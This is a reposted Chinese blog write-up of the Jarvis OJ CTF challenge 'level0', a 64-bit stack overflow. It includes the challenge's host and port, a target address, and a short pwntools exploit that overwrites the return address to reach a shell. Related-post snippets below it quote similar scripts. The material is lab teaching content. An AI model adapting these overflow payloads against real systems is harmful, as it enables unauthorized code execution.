Jarvis Oj Pwn 学习笔记-level0

最新推荐文章于 2025-02-18 15:53:11 发布

baoan4763

最新推荐文章于 2025-02-18 15:53:11 发布

阅读量213

点赞数

原文链接：http://www.cnblogs.com/Magpie/p/9116844.html

版权

一道64位的pwn题

呈上地址：

原文件：https://files.cnblogs.com/files/Magpie/level0.rar

nc pwn2.jarvisoj.com 9881

先查一下保护：

扔进ida：

典型的64位栈溢出，莫得啥子难度，注意一哈64位即可

控制流打到callsystem即可

地址是：0x400596

直接贴exp：

1 from pwn import *
2 context(arch = 'i386', os = 'linux')
3 r = remote('pwn2.jarvisoj.com', 9881)
4 # EXPLOIT CODE GOES HERE
5 r.send('A'*136+'\x96\x05\x40\x00')
6 r.interactive()

转载于:https://www.cnblogs.com/Magpie/p/9116844.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

baoan4763

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

(Jarvis Oj)(Pwn) level0

Nothing

04-17

1241

(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。用ida反汇编。main函数就调用了两个函数。跟进第二个函数。找到溢出点，同过buf缓冲区。又找到函数callsystem()。只要控制程序返回到callsystem地址即可。找到callsystem地址。写得脚本。 1 from pwn ...

BUUCTF PWN方向 1-6题详解wp

qq_62564422的博客

02-06

2519

构造payload：变量声明后顺序入栈，每个标识表示变量所占栈空间底部，s为输入的变量，则其需要覆盖的长度为0X3C~0X00(0X3C字节)，0X00处表示返回地址值(4字节)需要覆盖；返回地址的数据（8字节）（被垃圾数据覆盖后则改为访问之后地址）+（返回地址地址数+1）（远程端使用了ubuntu18，ubuntu18以上版本调用64位程序中的system函数需要栈对齐，在执行system时有一个指令需要栈对齐，所以地址+1）而且这个空间是连续的，v1之后就是v2，他们的内存块是接在一起的。

参与评论您还未登录，请先登录后发表或查看评论

jarvisoj pwn level0

Joey_l的博客

07-31

358

前几天做了几道pwn题，记录一下 https://www.jarvisoj.com/challenges 拿到程序后先file可知为64位程序和动态链接 file level0 然后checksec检查保护机制 checksec level0 将程序拖到ida中，F5反汇编，得到伪c代码双击vulnerable_function()函数可以看到read函数读0x200进入...

buuctf-jarvisoj_level0(pwn)题解

最新发布

2301_81574836的博客

02-18

382

buuctf-jarvisoj_level0(pwn)题解

JarvisOJ-PWN-Level0

杀生丸？不，其实我要的是桔梗

03-15

813

JarvisOJ-PWN-Level0 IDA打开分析。在Export找到这两个关键函数。先双击进入main 关键函数在vulnerable_function()，继续跟进。可以看出read函数是把标准输入的200位的写入buf中。再看buf：低位：高位：所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...

Jarvis OJ-PWN-[XMAN]level0 wp

分不清东西南北的Laffey

09-22

1000

地址：nc pwn2.jarvisoj.com 9881 第一次做pwn的题目先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机把文件放进去用checksec看一下发现是64位的程序编译时关了栈不可执行保护这说明我们可以在buf里面输入shellcode和填...

Jarvis OJ（PWN）level0

qq_43409582的博客

09-11

269

0x01 开始做Jarvisoj上的题了，先从最基本的开始吧。首先看保护：只开了NX，说明可能要利用栈溢出的知识。打开IDA看main函数没什么东西，但return了一个函数打开一看发现了栈溢出漏洞：然后找能利用的地方，发现了一个callsystem函数（太明显了）。。。所以思路就是利用栈溢出漏洞直接覆盖到/bin/sh执行的地址上，就能getshell 了。 exp.py: f...

CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)

m0_61330806的博客

04-07

686

这个页面按下F5，反汇编为伪代码看到关键函数system（）点进去看一下，是不是我们要的那种。双击那个system(a)好极了，就是这个。再来看一下变量command是如何传进去的，左上角箭头，回到历史记录再分析一下程序，用户的输入被存到了变量a中，a经过fun函数后，传入system函数执行，也就是说，command就是a，也就是用户的输入。再双击fun看一下，有没有特殊处理经典的字符串倒置代码，也就是说，它会把你的输入倒过来，即ls->sl ,cat flag->galf tac。

jarvisoj——[XMAN]level0

王嘟嘟的博客

07-14

389

题目 Wp 拿下来之后发现是一个64位的，直接开ida main函数，现在对main函数已经很熟悉了这里看到一个方法这里按照规则覆盖即可。脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

768

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

Jarvis OJ　[XMAN]level0

九层台

07-07

483

查保护和运行操作系统 liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary foun...

[buuctf]jarvisoj_level0

逆向萌新的博客

05-30

567

[buuctf]jarvisoj_level0

jarvisoj_level0

zip471642048的博客

01-17

440

jarvisoj_level0 pwn的最简单的题目了，难的我是真不会了，说一下做题思路首先拿到题目checksec检查一下开了什么东西 64位程序什么都没有开，太好了，开了东西就不会了~~。 ida64位查看shift＋F12看一下，看到了、/bin/bash和system，然后就是Hello World 查看main函数跟进vulnerable_function，很明显在这里发生溢出，buf的大小只有0x80但是缺接收了0x200导致溢出 gdb-peda调试程序，创建150用于溢出的字符串

PWN-题解

2301_79215333的博客

02-20

941

检查文件，64位，开启NX保护拖入IDA打开，查看主函数双击查看可以看到buf的长度只有0x80，即可用栈大小只有108字节，但是read()并没有限制输入，显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数，按F5反汇编可以看到这是一个系统调用，存在system（“/bin/sh”）即使用栈溢出令返回地址指向该函数地址即可。

buuctf ---- jarvisoj_level（全）

L0g1c的博客

01-22

4646

buuctf ----- jarvisoj_level0 运行一下程序使用64位的IDA查看程序查看vulner_function函数发现buf存在溢出漏洞，buf是0x80，read了0x200 存在栈溢出漏洞发现后门函数system("/bin/sh")，解题思路：修改read函数的ret address 为后门函数的地址。编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa

[BUUCTF]PWN8——jarvisoj_level0

mcmuyanga的博客

08-26

646

[BUUCTF]PWN8——jarvisoj_level0 题目网址：https://buuoj.cn/challenges#jarvisoj_level0 步骤：例行检查，64位，开启了NX保护 nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh 双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596 根据

日行一PWN jarvisoj_level0

m0_57221101的博客

05-14

252

还是来自于BUUCTF的机器，今天的很简单，就是单纯的考察了read函数的漏洞，以及对64位寄存器的理解开始首先还是经典查壳和内存保护，发现啥也没有，是很简单的机器。然后IDA反编译一下，由于是64位的软件所以需要IDA64 main函数首先可以看到主函数中知识调用了write函数，并输出了Hello， Worldn这么几个字到终端。之后调用了vulnerable_function函数因为反汇编并不会给出类似于write这种函数的定义，所以需要熟悉汇编的同学自行根据效果来